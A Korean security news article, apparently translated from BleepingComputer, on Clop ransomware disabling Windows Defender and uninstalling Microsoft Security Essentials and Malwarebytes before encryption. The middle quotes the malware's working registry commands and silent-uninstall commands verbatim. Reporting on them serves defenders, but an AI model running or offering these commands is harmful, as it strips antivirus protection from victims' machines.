윈도우 디펜더를 비활성화하려 시도하는 Clop 랜섬웨어 발견

Clop Ransomware Tries to Disable Windows Defender, Malwarebytes

Clop CryptoMix 랜섬웨어가 피해자의 데이터를 암호화하기 위해서 윈도우 디펜더 및 마이크로소프트 시큐리티 에센셜, Malwarebytes의 백신을 비활성화하려 시도하는 것으로 나타났습니다.

Clop은 CryptoMix 랜섬웨어의 변종으로, Clop 확장자를 사용하며 랜섬노트의 이름은 ClopReadMe.txt이며 "Dont Worry C|0P"이라는 메시지를 포함하고 있습니다. 이러한 이유로 이는 Clop 랜섬웨어로 명명되었습니다.

보안 연구원에 따르면, Clop 공격자들은 윈도우 디펜더를 비활성화하기 위해 암호화를 시작하기 전 다양한 보안 소프트웨어 비활성화를 시도하는 프로그램을 시도합니다. 

이 작업은 행위 알고리즘이 파일 암호화를 탐지해 랜섬웨어를 차단하는 것을 막기 위한 것입니다.

이 랜섬웨어는 윈도우 디펜더를 비활성화 하기 위해 행위 모니터링, 실시간 보호, 마이크로소프트에 샘플 업로드, 변조 보호, 클라우드 탐지, 안티-스파이웨어 탐지와 같은 기능을 비활성화하는 다양한 레지스트리 값을 설정합니다.

cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

cmd.exe /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f

cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

다행인 것은, Windows 10 에서 변조 보호 기능을 활성화한 상태일 경우, 기본 구성으로 재설정되며 윈도우 디펜더가 비활성화 되지 않는다는 것입니다. 

하지만 만약 사용자가 변조 보호 기능을 사용하지 않는다면, 윈도우 디펜더를 비활성화 하여 랜섬웨어를 탐지하지 못하도록 합니다. 

Clop 랜섬웨어는 오래된 컴퓨터에서 마이크로소프트 시큐리티 에센셜을 삭제하기도 합니다. CryptoMix는 관리자 권한으로 실행되기 때문에, 쉽게 해당 소프트웨어를 제거할 수 있습니다. 

cmd.exe /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s

Malwarebytes 안티 랜섬웨어 삭제 시도해

보안 연구원은 이 Clop 랜섬웨어가 윈도우 디펜더 이외에도 아래 명령어를 실행하여 Malwarebytes 안티 랜섬웨어 프로그램을 삭제하려고 시도하는 것을 발견했습니다. 

C:\Program Files\MalwareBytes\Anti-Ransomware\unins000.exe /verysilent /suppressmsgboxes /norestart

하지만 Malwarebytes의 안티-랜섬웨어 제품은 현재 서비스 중이 아니며, Malwarebytes의 안티멀웨어 소프트웨어로 통합된 상태입니다.

CryotoMix는 일반적으로 원격 데스크톱이나 기타 네트워크 침입을 통해 설치되기 때문에, 랜섬웨어가 네트워크 전체를 암호화할 수 있도록 오래된 기업 워크스테이션에서 사용할 수 있는 제품을 공격하는 것일지 모릅니다.

최근 네트워크 공격에 사용된 Clop 랜섬웨어

최근 TA505라는 APT 그룹이 Ryuk, BitPaymer, DoppelPaymer와 유사한 공격을 통해 네트워크를 해킹 후 이를 최종 페이로드로 사용했습니다.

프랑스의 언론은 Hospital Center University De Rouen이 Clop 랜섬웨어의 공격을 받아 서비스 중 일부가 영향을 받았다고 보도했습니다.

지난달, 벨기에의 University of Antwerp 또한 Clop에 공격을 받아 지불 시스템, 영상 강의 아카이브, 메일링 시스템이 영향을 받기도 했습니다. 

출처 :

https://www.bleepingcomputer.com/news/security/clop-ransomware-tries-to-disable-windows-defender-malwarebytes/